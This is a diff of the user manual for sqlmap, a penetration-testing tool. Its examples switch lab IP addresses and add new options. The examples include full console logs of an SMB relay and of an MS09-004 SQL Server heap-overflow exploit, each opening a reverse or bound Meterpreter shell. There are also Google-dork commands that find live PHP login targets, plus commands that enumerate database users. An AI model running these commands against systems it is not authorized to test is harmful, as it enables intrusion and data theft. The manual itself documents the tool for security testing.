      -[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
      +[*] Sending Access Denied to 172.16.213.131:3244 \
      +[*] Received 172.16.213.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
       Server 2003 3790 Service Pack 2 LM:
      -[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
      +[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
       [*] AUTHENTICATED as W2K3DEV\Administrator...
      -[*] Ignoring request from 192.168.1.131, attack already in progress.
      -[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
      +[*] Ignoring request from 172.16.213.131, attack already in progress.
      +[*] Sending Access Denied to 172.16.213.131:3244 W2K3DEV\Administrator
       [*] Sending stage (718336 bytes)
      -[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
      +[*] Meterpreter session 1 opened (172.16.213.161:51813 -> 172.16.213.131:4907)
       
       Active sessions
       ===============
       
         Id  Description  Tunnel                                       
         --  -----------  ------                                       
      -  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
      +  1   Meterpreter  172.16.213.161:51813 -> 172.16.213.131:4907  
       
       msf exploit(smb_relay) > [*] Starting interaction with 1...
       
      @@ -4861,69 +5244,61 @@ msf exploit(smb_relay) > exit
       

      -

      Stored procedure buffer overflow exploitation

      +

      Database stored procedure heap-based buffer overflow exploit

      -

      Options: --os-bof, --priv-esc and --msf-path

      +

      Options: --os-bof, --priv-esc and --msf-path

      -

      If the back-end database management system is not patched against Microsoft -Security Bulletin -MS09-004, -sqlmap can exploit the heap-based buffer overflow affecting -sp_replwritetovarbin stored procedure in order to establish an -out-of-band TCP stateful channel between the attacker host and the -target database server. +

      If the back-end database management system is Microsoft SQL Server not +patched against Microsoft Security Bulletin +MS09-004, sqlmap can exploit the heap-based buffer overflow +affecting sp_replwritetovarbin stored procedure in order to +establish an out-of-band TCP stateful channel between the +attacker host and the target database server. sqlmap has its own exploit to trigger the vulnerability, but it relies on Metasploit to -generate the shellcode used within the exploit, so you need to have it -already on your system: it's free and can be downloaded from the homepage.

      +generate the shellcode used within the exploit.

      Note that this feature is not supported by sqlmap running on Windows -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter.

      +platform because it relies on Metasploit's msfcli which is not +available for Windows.

      -

      This technique is detailed on the white paper -Advanced SQL injection to operating system full control.

      +

      This technique is detailed in the white paper +Advanced SQL injection to operating system full control and in the +slide deck +Expanding the control over the operating system from the database.

      Example on a Microsoft SQL Server 2005 Service Pack 0 target:

      -$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
      -  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
      +$ python sqlmap.py -u http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1 \
      +  --os-bof -v 1 --msf-path ~/software/metasploit
       
       [...]
      -[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
      -web server operating system: Windows 2000
       web application technology: ASP.NET, Microsoft IIS 6.0, ASP
       back-end DBMS: Microsoft SQL Server 2005
       
      -[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
      -[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
      -[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
      +[hh:mm:51] [INFO] testing stacked queries support on parameter 'id'
      +[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id'
      +[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
       stored procedure heap-based buffer overflow (MS09-004)
      -[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
      -[hh:mm:14] [INFO] retrieved: 1
      -[hh:mm:15] [INFO] retrieved: 1
      -[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
      -[hh:mm:15] [INFO] testing if current user is DBA
      -[hh:mm:15] [INFO] retrieved: 1
      -[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
      -[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
      -[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
      +[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack
      +[hh:mm:56] [INFO] retrieved: 1
      +[hh:mm:58] [INFO] retrieved: 1
      +[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
      +[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
       which connection type do you want to use?
      -[1] Bind TCP (default)
      -[2] Bind TCP (No NX)
      -[3] Reverse TCP
      -[4] Reverse TCP (No NX)
      +[1] Reverse TCP: Connect back from the database host to this machine (default)
      +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
      +between the specified and 65535
      +[3] Bind TCP: Listen on the database host for a connection
       > 
      -which is the back-end DBMS address? [192.168.1.131] 
      -which remote port numer do you want to use? [39391] 62719
      +which is the local address? [172.16.213.1] 
      +which local port number do you want to use? [21380] 
       which payload do you want to use?
      -[1] Reflective Meterpreter (default)
      -[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
      -[3] Shell
      -[4] Reflective VNC
      -[5] PatchUp VNC (only from Metasploit development revision 6742)
      +[1] Meterpreter (default)
      +[2] Shell
      +[3] VNC
       > 
       which payload encoding do you want to use?
       [1] No Encoder
      @@ -4940,217 +5315,122 @@ which payload encoding do you want to use?
       [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
       [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
       > 
      -[hh:mm:50] [INFO] creation in progress .................. done
      -[hh:mm:08] [INFO] handling DEP
      -[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
      -handle it
      -[hh:mm:08] [INFO] checking DEP system policy
      -[hh:mm:09] [INFO] retrieved: OPTIN
      -[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
      -[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
      -[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
      +[hh:mm:16] [INFO] creation in progress .... done
      +[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait..
       [*] Please wait while we load the module tree...
      -[*] Started bind handler
      +[*] Started reverse handler on 172.16.213.1:21380 
       [*] Starting the payload handler...
      -[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
      -[*] Sending stage (718336 bytes)
      -[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
      +[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait..
      +[*] Sending stage (748032 bytes)
      +[*] Meterpreter session 1 opened (172.16.213.1:21380 -> 172.16.213.128:12062)
       
      +meterpreter > Loading extension espia...success.
      +meterpreter > Loading extension incognito...success.
       meterpreter > Loading extension priv...success.
      -meterpreter > getuid
      -Server username: NT AUTHORITY\NETWORK SERVICE
      +meterpreter > Loading extension sniffer...success.
      +meterpreter > Computer: W2K3DEV
      +OS      : Windows .NET Server (Build 3790, Service Pack 2).
      +Arch    : x86
      +Language: en_US
      +meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
      +meterpreter > ipconfig
      +
      +MS TCP Loopback interface
      +Hardware MAC: 00:00:00:00:00:00
      +IP Address  : 127.0.0.1
      +Netmask     : 255.0.0.0
      +
      +
      +
      +VMware Accelerated AMD PCNet Adapter #2
      +Hardware MAC: 00:0c:29:86:69:1b
      +IP Address  : 172.16.213.128
      +Netmask     : 255.255.255.0
      +
      +
       meterpreter > exit
       

      -

      5.10 Miscellaneous +

      5.11 Windows registry access

      -

      Estimated time of arrival

      +

      Read a Windows registry key value

      -

      Option: --eta

      +

      Option: --reg-read

      -

      It is possible to calculate and show the estimated time of arrival to -retrieve each query output in real time while performing the SQL injection -attack.

      - -

      Example on an Oracle XE 10.2.0.1 target:

      -

      -

      -
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b \
      -  --eta -v 1
      -
      -[...]
      -back-end DBMS:  Oracle
      -
      -[hh:mm:24] [INFO] fetching banner
      -[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
      -output again
      -[hh:mm:24] [INFO] retrieved the length of query output: 64
      -[hh:mm:24] [INFO] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
      -WHERE ROWNUM=1
      -77% [=======================================>            ] 49/64  ETA 00:00    
      -
      -
      -

      - -

      then:

      -

      -

      -
      -100% [====================================================] 64/64              
      -[hh:mm:15] [INFO] performed 454 queries in 2 seconds
      -banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
      -
      -
      -

      - -

      Example on a Microsoft SQL Server 2000 Service Pack 0 target:

      -

      -

      -
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" \
      -  --users --eta -v 1
      -
      -[...]
      -back-end DBMS:  Microsoft SQL Server 2000
      -
      -[hh:mm:57] [INFO] fetching database users
      -[hh:mm:57] [INFO] fetching number of database users
      -[hh:mm:57] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), 
      -(CHAR(32))) FROM master..syslogins
      -[hh:mm:57] [INFO] retrieved: 3
      -[hh:mm:57] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:57] [INFO] retrieved the length of query output: 22
      -[hh:mm:57] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
      -master..syslogins WHERE name NOT IN (SELECT TOP 0 name FROM master..syslogins ORDER BY name) 
      -ORDER BY name
      -100% [====================================================] 22/22              
      -[hh:mm:58] [INFO] performed 160 queries in 0 seconds
      -[hh:mm:58] [INFO] retrieved the length of query output: 2
      -[hh:mm:58] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
      -master..syslogins WHERE name NOT IN (SELECT TOP 1 name FROM master..syslogins ORDER BY name) 
      -ORDER BY name
      -100% [====================================================] 2/2                
      -[hh:mm:59] [INFO] performed 20 queries in 0 seconds
      -[hh:mm:59] [INFO] retrieved the length of query output: 25
      -[hh:mm:59] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM 
      -master..syslogins WHERE name NOT IN (SELECT TOP 2 name FROM master..syslogins ORDER BY name) 
      -ORDER BY name
      -100% [====================================================] 25/25              
      -[hh:mm:00] [INFO] performed 181 queries in 1 seconds
      -database management system users [3]:
      -[*] BUILTIN\Administrators
      -[*] sa
      -[*] W2KITINQUIS\Administrator
      -
      -
      -

      - -

      As you can see, sqlmap first calculates the length of the query output, -then estimated the time of arrival, shows the progress in percentage and -counts the number of retrieved query output characters.

      +

      TODO

      -

      Update sqlmap to the latest stable version

      +

      Write a Windows registry key value data

      -

      Option: --update

      +

      Option: --reg-add

      + +

      TODO

      -

      It is possible to update sqlmap to the latest stable version available on -its -SourceForge File List page by running it with the ---update option.

      -

      -

      -
      -$ python sqlmap.py --update -v 4
      +

      Delete a Windows registry key value

      -[hh:mm:53] [DEBUG] initializing the configuration -[hh:mm:53] [DEBUG] initializing the knowledge base -[hh:mm:53] [DEBUG] cleaning up configuration parameters -[hh:mm:53] [DEBUG] setting the HTTP method to perform HTTP requests through -[hh:mm:53] [DEBUG] creating HTTP requests opener object -[hh:mm:53] [INFO] updating sqlmap -[hh:mm:53] [DEBUG] checking if a new version is available -[hh:mm:55] [TRAFFIC OUT] HTTP request: -GET /doc/VERSION HTTP/1.1 -Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) -Connection: close +

      Option: --reg-del

      -[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): -Date: Fri, 01 Aug 2008 14:50:55 GMT -Server: Apache/1.3.33 (Unix) PHP/4.3.10 -Last-Modified: Thu, 31 Jul 2008 11:10:19 GMT -ETag: "9fcc53e-4-48919d9b" -Accept-Ranges: bytes -Content-Length: 4 -Connection: close -Content-Type: text/plain -X-Pad: avoid browser bug - -[hh:mm:55] [INFO] you are already running sqlmap latest stable version -[hh:mm:55] [INFO] updating Microsoft SQL Server XML versions file -[hh:mm:56] [TRAFFIC OUT] HTTP request: -GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 -Host: www.sqlsecurity.com -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) -Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; -language=en-US -Connection: close - -[hh:mm:02] [TRAFFIC IN] HTTP response (OK - 200): -Cache-Control: private -Connection: close -Date: Fri, 01 Aug 2008 14:50:50 GMT -Content-Length: 167918 -Content-Type: text/html; charset=utf-8 -Server: Microsoft-IIS/6.0 -X-Powered-By: ASP.NET -X-AspNet-Version: 2.0.50727 -Set-Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; -expires=Fri, 10-Oct-2008 01:30:49 GMT; path=/; HttpOnly -Set-Cookie: language=en-US; path=/; HttpOnly - -[hh:mm:02] [INFO] no new Microsoft SQL Server versions since the last update -[hh:mm:02] [DEBUG] parsing XML queries file -
      -
      -

      - -

      As you can see, sqlmap first check if a new stable version is available, -then in case it is, download it, unzip it and update the Microsoft SQL -Server XML versions file from Chip Andrews' -SQLSecurity.com site.

      - -

      Note that the default configuration file sqlmap.conf is backupped -to sqlmap.conf.bak in case a new stable version is available and -your copy is updated.

      +

      TODO

      -

      Save and resume all data retrieved on a session file

      +

      Windows registry key

      + +

      Option: --reg-key

      + +

      TODO

      + + +

      Windows registry key value

      + +

      Option: --reg-value

      + +

      TODO

      + + +

      Windows registry key value data

      + +

      Option: --reg-data

      + +

      TODO

      + + +

      Windows registry key value type

      + +

      Option: --reg-type

      + +

      TODO

      + + +

      5.12 Miscellaneous +

      + +

      Session file: save and resume all data retrieved

      Option: -s

      -

      It is possible to log all queries and their output on a text file while +

      By default sqlmap logs all queries and their output into a text file while performing whatever request, both in blind SQL injection and in inband SQL injection. This is useful if you stop the injection and resume it after some time.

      +

      The default session file is output/hostname/session, but you can +change its path with the -s option.

      +

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
      -  -v 1 -s "sqlmap.log"
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
      +  -v 2 -s "sqlmap.log"
       
       [...]
       back-end DBMS:  PostgreSQL
      -[hh:mm:02] [INFO] query: VERSION()
      +[hh:mm:02] [DEBUG] query: VERSION()
       [hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C
       [hh:mm:03] [ERROR] user aborted
       
      @@ -5166,16 +5446,16 @@ retrieving the PostgreSQL banner and logged the session to text file $ cat sqlmap.log [hh:mm:00 MM/DD/YY] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL] -[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL] +[http://172.16.213.131/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 on i486-pc-
      @@ -5201,8 +5481,8 @@ retrieved to the end of the query output.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
      -  -v 1 -s "sqlmap.log"
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
      +  -v 2 -s "sqlmap.log"
       
       [...]
       [hh:mm:03] [INFO] resuming injection point 'GET' from session file
      @@ -5213,11 +5493,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
       [hh:mm:03] [INFO] testing connection to the target url
       [hh:mm:03] [INFO] testing for parenthesis on injectable parameter
       [hh:mm:03] [INFO] retrieving the length of query output
      -[hh:mm:03] [INFO] query: LENGTH(VERSION())
      +[hh:mm:03] [DEBUG] query: LENGTH(VERSION())
       [hh:mm:03] [INFO] retrieved: 98
       [hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-...
       [hh:mm:03] [INFO] retrieving pending 70 query output characters
      -[hh:mm:03] [INFO] query: SUBSTR((VERSION())::text, 29, 98)
      +[hh:mm:03] [DEBUG] query: SUBSTR((VERSION())::text, 29, 98)
       [hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real 
       (Ubuntu 4.3.2-1ubuntu11) 4.3.2
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
      @@ -5233,9 +5513,164 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
       

      -

      Save options on a configuration INI file

      +

      Flush session file for current target

      -

      Option: --save

      +

      Option: --flush-session

      + +

      As you are already familiar with the concept of a session file from the +description of option -s, it is good to know that you can flush +the content of that same file using option --flush-session. +This way you can avoid caching mechanisms implemented by default in +sqlmap. Other possible way is the manual removing of session file(s), +sqlmap.log in the example above, or the default +output/hostname/session if -s is not provided.

      + + +

      Estimated time of arrival

      + +

      Option: --eta

      + +

      It is possible to calculate and show the estimated time of arrival to +retrieve each query output in real time while performing the SQL injection +attack.

      + +

      Example on an Oracle XE 10.2.0.1 target:

      +

      +

      +
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b \
      +  --eta -v 2
      +
      +[...]
      +back-end DBMS:  Oracle
      +
      +[hh:mm:24] [INFO] fetching banner
      +[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
      +output again
      +[hh:mm:24] [INFO] retrieved the length of query output: 64
      +[hh:mm:24] [DEBUG] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
      +WHERE ROWNUM=1
      +77% [=======================================>            ] 49/64  ETA 00:00    
      +
      +
      +

      + +

      then:

      +

      +

      +
      +100% [====================================================] 64/64              
      +[hh:mm:15] [DEBUG] performed 454 queries in 2 seconds
      +banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
      +
      +
      +

      + +

      Example on a Microsoft SQL Server 2000 Service Pack 0 target:

      +

      +

      +
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" \
      +  --users --eta -v 1
      +
      +[...]
      +back-end DBMS:  Microsoft SQL Server 2000
      +
      +[hh:mm:57] [INFO] fetching database users
      +[hh:mm:57] [INFO] fetching number of database users
      +[hh:mm:57] [INFO] retrieved: 3
      +[hh:mm:57] [INFO] retrieved the length of query output: 22
      +100% [====================================================] 22/22
      +[hh:mm:58] [INFO] retrieved the length of query output: 2
      +100% [====================================================] 2/2
      +[hh:mm:59] [INFO] retrieved the length of query output: 25
      +100% [====================================================] 25/25
      +[hh:mm:00] [DEBUG] performed 181 queries in 1 seconds
      +database management system users [3]:
      +[*] BUILTIN\Administrators
      +[*] sa
      +[*] W2KITINQUIS\Administrator
      +
      +
      +

      + +

      As you can see, sqlmap first calculates the length of the query output, +then estimates the time of arrival, shows the progress in percentage and +counts the number of retrieved query output characters.

      + + +

      Use Google dork results from specified page number

      + +

      Option: --gpage

      + +

      Default sqlmap behavior with option -g is to do a Google +search and use resulting urls from first (100) result page for further +sql injection testing. In combination with this option you can specify +some other page other than the first one for retrieving target urls.

      + +

      Example of Google dorking with expression login ext:php +and resulting page set to 3:

      +

      +

      +
      +$ python sqlmap.py -g "ext:php login" --gpage 3 -v 1
      +
      +[hh:mm:14] [INFO] first request to Google to get the session cookie
      +[hh:mm:14] [INFO] using Google result page #3
      +[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are 
      +testable targets
      +[hh:mm:15] [INFO] sqlmap got a total of 89 targets
      +url 1:
      +GET http://www.XXX.com/index.php?pageid=login
      +do you want to test this url? [Y/n/q]
      +> y
      +[hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login
      +[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file
      +[hh:mm:17] [INFO] testing connection to the target url
      +[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
      +[hh:mm:19] [INFO] url is stable
      +[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
      +[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
      +[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
      +[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
      +[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
      +[...]
      +
      +
      +

      + + +

      Update sqlmap

      + +

      Option: --update

      + +

      Using this option you can update the program to the latest version +directly from the Subversion repository along with the latest +Microsoft SQL Server XML versions file from Chip Andrews' +SQLSecurity.com site.

      +

      +

      +
      +$ python sqlmap.py --update
      +
      +[...]
      +[hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository
      +[hh:mm:28] [INFO] updated to the latest revision XXXX
      +[hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file
      +[hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update
      +[...]
      +
      +
      +

      + +

      The Debian and Red Hat installation packages (deb and rpm) as well as the +Windows binary package (exe) can not be used to update sqlmap. You need +a source package (gzip, bzip2 or zip) to use this feature.

      + + +

      Save options in a configuration INI file

      + +

      Option: --save

      It is possible to save the command line options to a configuration INI file.

      @@ -5244,10 +5679,10 @@ file.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
         -v 1 --save
       
      -[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-SAUbs.conf' 
      +[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' 
       configuration file
       [hh:mm:33] [INFO] testing connection to the target url
       [hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
      @@ -5263,12 +5698,31 @@ INI file, sqlmap-SAUbs.conf.

       $ cat sqlmap-SAUbs.conf
       [Target]
      -url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
      +url = http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1
       googledork = 
      +configfile = 
       list = 
      +requestfile = 
      +
      +[Windows]
      +regread = False
      +regval = 
      +regdata = 
      +regadd = False
      +regdel = False
      +regtype = 
      +regkey = 
      +
      +[User-defined function]
      +shlib = 
      +udfinject = False
       
       [Request]
      +cookieurlencode = False
      +ignoreproxy = False
       threads = 1
      +acert = 
      +retries = 3
       useragentsfile = 
       atype = 
       agent = 
      @@ -5277,8 +5731,10 @@ headers =
       cookie = 
       proxy = 
       timeout = 30
      +scope = 
       acred = 
       referer = 
      +dropsetcookie = False
       data = 
       method = GET
       
      @@ -5287,31 +5743,35 @@ updateall = False
       sessionfile = 
       eta = False
       batch = False
      +flushsession = False
       cleanup = False
      +googlepage = 0
       verbose = 1
       
       [Enumeration]
      -dumpall = False
       limitstop = 0
      -getusers = False
      -isdba = False
       getpasswordhashes = False
       excludesysdbs = False
       getcurrentdb = False
      +getcurrentuser = False
      +limitstart = 0
      +query = 
      +getusers = False
      +isdba = False
       gettables = False
       dumptable = False
      +getdbs = False
       db = 
      -limitstart = 0
      -getprivileges = False
       sqlshell = False
       tbl = 
      +firstchar = 0
       getcolumns = False
      -query = 
      -getdbs = False
      -user = 
      -col = 
      -getcurrentuser = False
       getbanner = True
      +dumpall = False
      +getprivileges = False
      +lastchar = 0
      +col = 
      +user = 
       
       [File system]
       dfile = 
      @@ -5343,26 +5803,25 @@ eregexp =
       os = 
       
       [Techniques]
      -stackedtest = False
       utech = 
       unionuse = False
       timetest = False
       uniontest = False
      +stackedtest = False
      +timesec = 5
       

      The file is a valid sqlmap configuration INI file. You can edit the configuration options as you wish and pass it to sqlmap -with the -c option as explained above in section 5.2:

      +with the -c option as explained above in section 5.2.5:

      -$ python sqlmap.py -c "sqlmap-SAUbs.conf"
      +$ python sqlmap.py -c sqlmap-SAUbs.conf
       
       [...]
      -[hh:mm:16] [INFO] performed 657 queries in 6 seconds
      -
       banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
       (Ubuntu 4.3.2-1ubuntu11) 4.3.2'
       
      @@ -5372,19 +5831,20 @@ banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real

      Act in non-interactive mode

      -

      Option: --batch

      +

      Option: --batch

      -

      If you want sqlmap to run as a batch tool, without interacting with you in -case of a choice has to be done, you can force it by using --batch -option than letting sqlmap go for a default behaviour.

      +

      If you want sqlmap to run as a batch tool, without any user's interaction +when sqlmap requires it, you can force it by using --batch +option, and leave sqlmap to go for a default behaviour.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
         --batch -v 1
       
      +[...]
       [hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
       [hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
       [hh:mm:22] [INFO] GET parameter 'id' is dynamic
      @@ -5414,23 +5874,23 @@ back-end DBMS:  MySQL >= 5.0.0
       

      -

      As you can see, sqlmap choosed automatically to injection on the first -vulnerable parameter which is the default behaviour.

      +

      As you can see, sqlmap by default chose the injection payload to the first +vulnerable parameter.

      -

      Clean up the DBMS by sqlmap specific UDF and tables

      +

      Cleanup the DBMS by sqlmap specific UDF(s) and table(s)

      -

      Option: --cleanup

      +

      Option: --cleanup

      It is recommended to clean up the back-end database management system from -sqlmap temporary tables and created user-defined functions when you are -done with owning the underlying operating system or file system.

      +sqlmap temporary table(s) and created user-defined function(s) when you +are done with owning the underlying operating system or file system.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \
         -v 2 --cleanup
       
       [...]
      @@ -5459,19 +5919,22 @@ WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
       FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
       details.

      -

      Whatever you do with this tool is uniquely your responsability. If you are +

      Whatever you do with this tool is uniquely your responsibility. If you are not authorized to punch holes in the network you are attacking be aware that such action might get you in trouble with a lot of law enforcement agencies.

      -

      7. Author

      +

      7. Authors

      Bernardo Damele A. G. (inquis) - Lead developer. PGP Key ID: 0x05F5A30F

      - +

      +Miroslav Stampar (stamparm) - Developer. +PGP Key ID: +0xB5397B1B

